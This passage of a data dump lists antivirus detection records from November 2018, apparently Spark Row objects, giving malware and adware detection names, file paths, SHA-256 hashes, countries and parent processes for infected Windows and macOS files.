  Row(detection=Row(filename='graph.exe', filepath='C:\\Program Files (x86)\\Microsoft Office\\Office14\\GRAPH.EXE', filesize=4336000, name='W32/Jeefo.A.#M1.#R1'), hash='457eb99755520770d7079a8ee4a46c4b35a26718179f1b74f2e33736fa8c441b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\svchost.exe', parentsize=36352, timestamp='2018-11-04T13:33:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yqzeslwi.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\yQZESLWI.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:34:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ue32.exe', filepath='\\\\?\\D:\\Anti Virus\\all norton virsion\\Norton AntiVirus 2003 Pro (final)\\AdvTools\\UE32.EXE', filesize=512000, name='W32/Sality.Patched.#M1.#R1'), hash='e96842aadbfbb3743367849ec9d5762a6e3632526b64c98aa5c9e218f9d02d2b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:26:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101945-9cd71c35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101945-9CD71C35', filesize=64000, name='TR/Siggen.rcdir.#M1.#R1'), hash='fbad3124805b2597f2a57f33dbe90c81b6c12fb510ccbdfc98331a92fe9cf52e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:19:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221453-59a2759d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221453-59A2759D', filesize=64000, name='TR/Siggen.rcdir.#M1.#R1'), hash='fbad3124805b2597f2a57f33dbe90c81b6c12fb510ccbdfc98331a92fe9cf52e', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:14:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='icomboobject.dll', filepath='C:\\Microgaming\\Poker\\BetssonMPP\\control\\icomboobject.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='c680cd43a2a262cb06a2d0c8f5b61dd8ddb013814b6c32f7736db553f6f6b66a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Microgaming\\Poker\\BetssonMPP\\mppoker.exe', parentsize=1289976, timestamp='2018-11-02T09:56:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='asoftsqlexplorer.exe', filepath='E:\\KHACHHANG\\SongBinh\\CHIPHU\\Asoftsystem_2013\\AsoftSQLExplorer.exe', filesize=17024000, name='TR/Patched.Ren.Gen.#M300.#R2275'), hash='9c83b8af9585f98dc705ec050910fc571567e761a1632e1c222dbead9460a9ae', metadata=Row(cmdline='x -iext -ow -ver -- \\\\\\"E:\\\\\\\\KHACHHANG\\\\\\\\SongBinh\\\\\\\\CHIPHU\\\\\\\\Asoftsystem_2013.rar\\\\\\" E:\\\\\\\\KHACHHANG\\\\\\\\SongBinh\\\\\\\\CHIPHU\\\\\\\\', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1567448, timestamp='2018-11-02T02:15:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uninstaller.exe', filepath='C:\\Program Files\\FOSYJ8X56N\\uninstaller.exe', filesize=192000, name='ADWARE/EoRezo.Gen7.#M300.#R602706'), hash='c6e6ea1cc8de54f0a5ba0c4c6c2435b8e32fed65f5942a6633699acc1c5b3ad6', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=114408, timestamp='2018-11-02T11:11:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tcls_core.exe', filepath='\\\\?\\C:\\Program Files\\WeGame\\tcls\\tcls_core.exe', filesize=1124000, name='W32/Sality.AT.#M1.#R1'), hash='9ecc70cccfac22c196ba9658a9971ee4534aa55e5854527c4a81b5baa17b9762', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trz87ee.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\trz87EE.tmp', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:05:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gugywlyc.exe', filepath='c:\\users\\X\\appdata\\roaming\\gugywlyc.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T18:43:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082252-1a3ec922', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d48d98b8\\AVSCAN-20181102-082049-03B6DDCB\\AVSCAN-20181102-082252-1A3EC922', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='9a433500a68682e31adc76345d0965a53ff6c930f059fe6a910a3bbbdf7242d9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-004724-9a08a740', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e0de1845\\AVSCAN-20181103-004631-8E72A937\\AVSCAN-20181103-004724-9A08A740', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T16:45:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\monero\\Zcash Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:41:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nst70E6.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:48:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='solidconverterpdf.exe', filepath='\\\\nas-2tb\\共用資料夾\\1.暫存業務區\\5.黃佳音\\舊資料\\9.吳伊環\\巫data\\資訊軟體\\solid converter pdf 7.3 build 1541\\solidconverterpdf.exe', filesize=2432000, name='W32/Stanit.#M1.#R1'), hash='abcd4f7fab8ff279901524929cf1e894964ed761eae6322e766d195c700cbb21', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:C1hRPhq5PE2zUF3r.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=114408, timestamp='2018-11-02T05:24:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-180026-1723a54a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a99ca5dc\\AVSCAN-20181102-175953-132F293E\\AVSCAN-20181102-180026-1723A54A', filesize=64000, name='TR/Dropper.Gen.#M1.#R1'), hash='f815b8a789320a6d4d1510b5ce36e3af075fd66c729ef1d1666990ee9b5aed98', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:00:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ftx global vector configuration tool.exe', filepath='c:\\program files (x86)\\lockheed martin\\prepar3d v3\\orbx\\ftx_vector\\ftx global vector configuration tool.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline='restore', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Orbx\\FTXCentral\\v3.3.1.4\\FTXCentral.exe', parentsize=2565120, timestamp='2018-11-02T22:23:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='icaredatarecovery.exe', filepath='E:\\HBCD\\Programs\\iCareDataRecovery.exe', filesize=64000, name='TR/Siggen.64000.9.#M1.#R1'), hash='c1861cb3e5d8193ebcc61ccee37d797fd13700ea8ad6080c5d62696233d914b6', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clipgrab-3.6.8-cgorg.exe', filepath='C:\\Users\\X\\Downloads\\New folder\\clipgrab-3.6.8-cgorg.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T10:10:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xcopy.exe', filepath='C:\\Windows\\System32\\xcopy.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c786b1c3006f9154eaf7cd6ca3c9321d66a92b3bb7df722c27e040ce08aeab69', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T04:15:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-072236-95d2a70c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_544a1cd1\\AVSCAN-20181102-072030-8E7FE97C\\AVSCAN-20181102-072236-95D2A70C', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:03:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CZ.#M1.#R1'), hash='ea74978487a83ede72c7c95d321d0481ce24c66b678af4114b16d4f89b1e09a5', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:51:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\C:\\Windows\\Temp\\lgEC029.tmp\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T15:31:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=36096000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='d8a9883dcbb2624d9fc1488f7183a2a1aae12e638d0b4b21309f443cc5fe96af', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T20:15:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hopinst.exe', filepath='C:\\Program Files (x86)\\interhpx_00000001\\HopInst.exe', filesize=192000, name='Adware/ELEX.umebz.#M1.#R1'), hash='bf33a2fa1417e9e761302b0d0f29c355a3841a18117dadb6085389763bbf5f4d', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:28:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='98769fd1f2113d6f39d77ed76d7df6b9abb1977dc07c9cb00ebb939b605b9bff', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\98769FD1F2113D6F39D77ED76D7DF6B9ABB1977DC07C9CB00EBB939B605B9BFF', filesize=2048000, name='TR/Inject.ogoa.#M1.#R1'), hash='98769fd1f2113d6f39d77ed76d7df6b9abb1977dc07c9cb00ebb939b605b9bff', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:28:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ranoro.exe', filepath='C:\\Users\\pr\\AppData\\Local\\Temp\\{F636CA0A-DE1E-B272-8646-9A5A6EAE4282}\\ranoro.exe', filesize=2112000, name='Adware/DealPly.c80ecc.#M1.#R1'), hash='c80ecc2af79cae96b54a857744a3b37d9708eced304e6e3d36168c4a6bedc49c', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:02:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151656-3fa3c47c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0c607d02\\AVSCAN-20181102-151640-3C5D8903\\AVSCAN-20181102-151656-3FA3C47C', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='8d12098f11cfd65e18472f19c73b57a4f27879830d0394de48d1455636dbcebe', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:16:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gstautodetect.dll', filepath='C:\\Program Files\\Opera\\gstreamer\\plugins\\gstautodetect.dll', filesize=64000, name='W32/Ramnit.C.#M1.#R1'), hash='ce848ac084af9cd0869f2dfc5db7767a70130eda78de44607d77dff4fc3230df', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:23:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9d0a5093fae1a1a1aa57f7bae87dc26d05b6984d', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\9d0a5093fae1a1a1aa57f7bae87dc26d05b6984d', filesize=320000, name='Adware/DealPly.f10c00.#M1.#R1'), hash='f10c007a404dbae3243abd50b27a193be17ae38ebc8bc1de4c5a01e23473df9c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:45:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:33:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='launcher.exe', filepath='\\?\\F:\\Eren\\Flaşh Yeni\\KÜÇÜK OYUNLAR\\OYUNLAR\\otobüs\\launcher.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='fae24346ed58adee51d5704755c942a03ccb36a128d52fe27008760e09e7d50c', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:16:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e8e4707ca2468b241a727b7ea430220663115263e6cb3f2a60af723b6b174073', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\E8E4707CA2468B241A727B7EA430220663115263E6CB3F2A60AF723B6B174073', filesize=1408000, name='TR/Crypt.ZPACK.Gen.#M300.#R3881'), hash='e8e4707ca2468b241a727b7ea430220663115263e6cb3f2a60af723b6b174073', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T11:56:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fb20317818efc5c33e6e6dca73e50886a2955c845ae55ff90619bfcc33a28e9f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\FB20317818EFC5C33E6E6DCA73E50886A2955C845AE55FF90619BFCC33A28E9F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fb20317818efc5c33e6e6dca73e50886a2955c845ae55ff90619bfcc33a28e9f', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:05:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl155.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl155.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ce3b', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ce3b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:42:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ytdsetup.exe', filepath='F:\\\xa0\\YTDSetup.exe', filesize=10304000, name='Adware/Adware.543562.#M1.#R1'), hash='aeaaa560e95d54a6ed2392d59898f295f6e9368bc9b8c1d8f537b79f4c3dc798', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4848960, timestamp='2018-11-04T06:14:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d89af1ce2554b8c08a71cd125191f07a07ee07f6659a32f1a6f6dcf27b3ad0f7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D89AF1CE2554B8C08A71CD125191F07A07EE07F6659A32F1A6F6DCF27B3AD0F7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d89af1ce2554b8c08a71cd125191f07a07ee07f6659a32f1a6f6dcf27b3ad0f7', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:56:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:57:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xocr32b.exe', filepath='C:\\Program Files (x86)\\Sharp\\Sharpdesk\\XOCR32B.exe', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='dc650ca8ee0ebfc411d42c34f29d868dfcb6cf2a591b9feb71920e7312c55483', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:rsUe4FcwdUKb06K7.1', country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T01:22:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sendcrashreport.exe', filepath='C:\\Program Files\\Foxit Software\\Foxit Reader\\SendCrashReport.exe', filesize=2472000, name='TR/Patched.Ren.Gen.#M300.#R3374'), hash='e8e5585cd4e1371c1ce1ea0f5e62d2b04c22adfdb871a7f5d225250bf1220a4b', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='PK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=49664, timestamp='2018-11-04T08:07:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pd98eval.exe', filepath='\\\\?\\D:\\برامج الصيانة والتعليم\\الصيانةوتعليم\\صيانة\\PowerDesk Utilities 98\\PD98EVAL.EXE', filesize=2944000, name='HEUR/APC.#M1.#R1'), hash='ee424ea742236717686c9a81ca109b7b8428ef00c9128a39c40731d9ea3df855', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:49:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='spnativemessage.exe', filepath='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\Surfing Protection\\SPNativeMessage.exe', filesize=1460000, name='W32/Neshta.A.#M1.#R1'), hash='fd862b80b8e984b8872cb4e0e7e7429551b1aab5f28c152edaa0beb4538628ba', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\WiseRegistryCleaner\\Activator.exe', parentsize=684032, timestamp='2018-11-04T21:49:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T08:04:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-22-004650/Macintosh HD/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T02:32:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:39:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-234008-208d6968', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e5898a29\\AVSCAN-20181101-173653-C48861B1\\AVSCAN-20181101-234008-208D6968', filesize=704000, name='ADWARE/MultiPlug.Gen4.#M1.#R1'), hash='f9791dd197f1dd6d6732409acee55bbf0b29c6ed290779a2084981f8f4a7e17f', metadata=Row(cmdline=None, country='EE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:40:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='snare.dll', filepath='C:\\Users\\X\\Desktop\\prepa buenavista\\AppData\\Local\\CSHMDR\\Snare.dll', filesize=832000, name='TR/Snarasite.ME.15.#M1.#R1'), hash='fea6e6814f6c07f0cbc5e609755c7131cf91ccff7843eb7ad6653c8c99b9d2e8', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:42:29Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='compiler.exe', filepath='E:\\PC\\Exploit\\PDF EXPLOIT\\Pdf Exploit Builder\\compiler\\compiler.exe', filesize=384000, name='W32/Neshta.A.#M1.#R1'), hash='4dd76092971b5696b9de79f8b7c219cb9769e34c37939b5c97278f352c826fbc', metadata=Row(cmdline='-r', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-02T08:09:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T03:10:18Z'), dt=datetime.date(2018, 11, 2)),
